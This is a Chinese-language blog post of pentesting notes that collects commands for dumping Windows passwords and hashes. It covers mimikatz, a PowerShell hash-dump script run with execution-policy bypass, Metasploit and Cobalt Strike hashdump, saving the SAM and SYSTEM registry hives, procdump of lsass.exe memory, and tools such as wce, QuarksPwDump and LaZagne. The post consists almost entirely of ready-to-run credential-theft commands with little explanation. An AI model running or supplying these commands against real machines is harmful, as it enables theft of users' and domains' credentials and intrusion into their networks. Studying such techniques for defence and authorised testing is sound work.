Drunkmars's Blog

windows环境下抓密码总结

字数统计: 494阅读时长: 2 min
2021/04/08 Share

本文将会介绍如何在windows环境下抓取用户hash。

在线抓密码

mimikatz

输出到日志

1
mimikatz log privilege::debug sekurlsa::ekeys
1
2
3
4
5
6
7
privilege::debug

token::whoami

token::elevate

lsadump::sam

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

ps脚本

使用Get-PassHashes.ps1

1
2
3
4
5
powershell -exec bypass

Import-Module .\\Get-PassHashes.PS1

Get-PassHashes

msf

拿到meterpreter的过程省略掉,用smb445端口建立连接即可

1
2
3
4
5
6
7
8
9
run hashdump

hashdump

post/windows/gather/credentials/domain_hashdump(获取域hash)

use mimikatz

wdigest(明文)

cs上线

需要主机至少为administrator权限,user权限需提权后再抓

1
2
3
4
5
hashdump

wdigest

logonpasswords(明文)

此处我用的powershell上线,上线过程就不赘述

hashdump命令

wdigest命令

logonpasswords命令

离线抓密码

SAM(卷影副本、注册表)

卷影副本:卷影副本,也称为快照,是存储在 Data Protection Manager (DPM)

服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享、文件夹和文件的完整时间点副本。

管理员状态下执行如下命令

1
2
3
reg save hklm\\sam sam.hiv

reg save hklm\\system system.hiv

再到mimikatz下执行如下命令

1
lsadump::sam /sam:sam.hiv /system:system.hiv

lsass.exe(注入lsass.exe进程,并从其内存中提取)

执行如下命令:

1
procdump.exe -accepteula -ma lsass.exe lsass.dmp

在有mimikatz和dmp文件的目录下运行cmd,执行如下命令

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

注:这两步都需要为管理员权限,否则会报错如下

手工导出lsass.dmp文件

使用任务管理器导出lsass.dmp文件

步骤同上

其他工具

QuarksPwDump

命令如下:

1
QuarksPwDump.exe –dhl -o hash.txt

wce

抓取明文

1
wce.exe -w

抓取hash

1
wce.exe -l

lazagne.exe

命令如下

1
lazagne.exe windows

后记

此处还有很多抓hash的高级方法,但是因为技术的原因这里即使实践也不懂得原理,所以暂时先不深入研究,贴个链接给有兴趣的师傅们,可以继续钻研一下,等到知识储备足够时再来研究

https://www.4hou.com/posts/6zDV

CATALOG
  1. 1. 在线抓密码
    1. 1.1. mimikatz
    2. 1.2. ps脚本
    3. 1.3. msf
    4. 1.4. cs上线
  2. 2. 离线抓密码
    1. 2.1. SAM(卷影副本、注册表)
    2. 2.2. lsass.exe(注入lsass.exe进程,并从其内存中提取)
    3. 2.3. 手工导出lsass.dmp文件
  3. 3. 其他工具
    1. 3.1. QuarksPwDump
    2. 3.2. wce
    3. 3.3. 抓取hash
    4. 3.4. lazagne.exe
  4. 4. 后记